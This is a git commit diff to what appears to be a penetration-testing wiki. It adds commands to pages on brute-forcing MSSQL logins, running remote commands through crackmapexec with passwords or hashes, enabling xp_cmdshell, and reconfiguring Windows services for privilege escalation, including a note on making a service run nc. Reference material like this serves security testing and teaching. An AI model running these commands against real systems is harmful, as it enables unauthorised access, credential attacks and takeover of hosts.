GitBook: [master] 3 pages modified
This commit is contained in:
parent
9a083bb673
commit
3f541f3133
@ -298,6 +298,7 @@ hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for
|
||||
|
||||
```bash
|
||||
#Use the NetBIOS name of the machine as domain
|
||||
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
|
||||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
|
||||
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be carefull with the number of password in the list, this could block accounts
|
||||
|
@ -81,11 +81,16 @@ msf> use windows/manage/mssql_local_auth_bypass
|
||||
### Execute commands
|
||||
|
||||
```bash
|
||||
#Username + Password + CMD command
|
||||
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
|
||||
#Username + Hash + PS command
|
||||
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
|
||||
|
||||
#this turns on advanced options and is needed to configure xp_cmdshell
|
||||
sp_configure 'show advanced options', '1'
|
||||
RECONFIGURE
|
||||
#this enables xp_cmdshell
|
||||
sp_configure 'xp_cmdshell', '1'
|
||||
sp_configure 'xp_cmdshell', '1'
|
||||
RECONFIGURE
|
||||
# Quickly check what the service account is via xp_cmdshell
|
||||
EXEC master..xp_cmdshell 'whoami'
|
||||
|
@ -488,6 +488,12 @@ sc config SSDPSRV obj= ".\LocalSystem" password= ""
|
||||
|
||||
**Take into account that the service upnphost depends on SSDPSRV to work \(for XP SP1\)**
|
||||
|
||||
**Another workaround** of this problem is running:
|
||||
|
||||
```text
|
||||
sc.exe config usosvc start= auto
|
||||
```
|
||||
|
||||
### **Modify service binary path**
|
||||
|
||||
If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:
|
||||
|
Loading…
Reference in New Issue
Block a user